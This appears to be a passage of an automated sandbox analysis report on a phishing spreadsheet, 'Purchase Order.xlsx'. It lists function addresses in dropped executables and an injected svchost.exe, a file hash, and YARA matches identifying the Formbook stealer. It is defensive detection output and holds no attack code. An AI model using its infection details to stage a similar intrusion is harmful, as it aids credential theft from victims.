          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B8716_2_0041B871
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041CBC66_2_0041CBC6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041BBDB6_2_0041BBDB
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041C3A26_2_0041C3A2
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041BC4D6_2_0041BC4D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00408C6B6_2_00408C6B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00408C706_2_00408C70
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00408C2A6_2_00408C2A
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041BCF36_2_0041BCF3
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B4B66_2_0041B4B6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041BD216_2_0041BD21
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00402D896_2_00402D89
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041C7FE6_2_0041C7FE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEE0C66_2_00BEE0C6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C0905A6_2_00C0905A
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C1D0056_2_00C1D005
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF30406_2_00BF3040
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEE2E96_2_00BEE2E9
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C912386_2_00C91238
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C163DB6_2_00C163DB
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEF3CF6_2_00BEF3CF
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C963BF6_2_00C963BF
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C3A37B6_2_00C3A37B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF23056_2_00BF2305
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF73536_2_00BF7353
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C254856_2_00C25485
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C014896_2_00C01489
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C2D47D6_2_00C2D47D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C7443E6_2_00C7443E
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C0C5F06_2_00C0C5F0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C365406_2_00C36540
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF351F6_2_00BF351F
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF46806_2_00BF4680
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BFE6C16_2_00BFE6C1
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C926226_2_00C92622
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C3A6346_2_00C3A634
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C257C36_2_00C257C3
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BFC7BC6_2_00BFC7BC
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C7579A6_2_00C7579A
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C8F8EE6_2_00C8F8EE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C1286D6_2_00C1286D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BFC85C6_2_00BFC85C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF29B26_2_00BF29B2
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C069FE6_2_00C069FE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C9098E6_2_00C9098E
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C7394B6_2_00C7394B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C759556_2_00C75955
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00CA3A836_2_00CA3A83
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C7DBDA6_2_00C7DBDA
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEFBD76_2_00BEFBD7
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C9CBA46_2_00C9CBA4
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C17B006_2_00C17B00
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C8FDDD6_2_00C8FDDD
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BFCD5B6_2_00BFCD5B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C20D3B6_2_00C20D3B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C0EE4C6_2_00C0EE4C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C22E2F6_2_00C22E2F
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C62FDC6_2_00C62FDC
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C8CFB16_2_00C8CFB1
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C1DF7C6_2_00C1DF7C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C00F3F6_2_00C00F3F
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004010306_1_00401030
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041C3A26_1_0041C3A2
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B4B66_1_0041B4B6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041C7FE6_1_0041C7FE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B8716_1_0041B871
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041CBC66_1_0041CBC6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041BBDB6_1_0041BBDB
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041BC4D6_1_0041BC4D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00408C6B6_1_00408C6B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00408C706_1_00408C70
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00408C2A6_1_00408C2A
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041BCF36_1_0041BCF3
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041BD216_1_0041BD21
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00402D896_1_00402D89
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00402D906_1_00402D90
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00402FB06_1_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085E0C610_2_0085E0C6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0088D00510_2_0088D005
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086304010_2_00863040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0087905A10_2_0087905A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085E2E910_2_0085E2E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0090123810_2_00901238
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_009063BF10_2_009063BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085F3CF10_2_0085F3CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008863DB10_2_008863DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086230510_2_00862305
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086735310_2_00867353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008AA37B10_2_008AA37B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0089548510_2_00895485
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0087148910_2_00871489
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008E443E10_2_008E443E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0089D47D10_2_0089D47D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0087C5F010_2_0087C5F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086351F10_2_0086351F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008A654010_2_008A6540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086468010_2_00864680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086E6C110_2_0086E6C1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0090262210_2_00902622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008AA63410_2_008AA634
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008E579A10_2_008E579A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086C7BC10_2_0086C7BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008957C310_2_008957C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008FF8EE10_2_008FF8EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086C85C10_2_0086C85C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0088286D10_2_0088286D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0090098E10_2_0090098E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008629B210_2_008629B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008769FE10_2_008769FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008E394B10_2_008E394B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008E595510_2_008E5955
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00913A8310_2_00913A83
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0090CBA410_2_0090CBA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085FBD710_2_0085FBD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008EDBDA10_2_008EDBDA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00887B0010_2_00887B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008FFDDD10_2_008FFDDD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00890D3B10_2_00890D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086CD5B10_2_0086CD5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00892E2F10_2_00892E2F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0087EE4C10_2_0087EE4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008FCFB110_2_008FCFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008D2FDC10_2_008D2FDC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00870F3F10_2_00870F3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0088DF7C10_2_0088DF7C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B4B610_2_0009B4B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009C7FE10_2_0009C7FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B87110_2_0009B871
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009CBC610_2_0009CBC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009BBDB10_2_0009BBDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00088C2A10_2_00088C2A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009BC4D10_2_0009BC4D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00088C6B10_2_00088C6B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00088C7010_2_00088C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00082D8910_2_00082D89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00082D9010_2_00082D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00082FB010_2_00082FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007867C710_2_007867C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0078506210_2_00785062
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007832FF10_2_007832FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0078136210_2_00781362
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0078330210_2_00783302
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007875B210_2_007875B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007808F910_2_007808F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0078090210_2_00780902
          Source: Purchase Order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00419F80 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00C33F92 appears 132 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00BEDF5C appears 119 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00C3373B appears 244 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00BEE2A8 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00C5F970 appears 84 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0085E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008CF970 appears 84 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008A373B appears 245 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008A3F92 appears 132 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0085DF5C appears 120 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: String function: 03C1E35C appears 96 times
          Source: scancopy87867678[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/12@12/8
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C3A6AD GetLastError,FormatMessageW,5_2_00C3A6AD
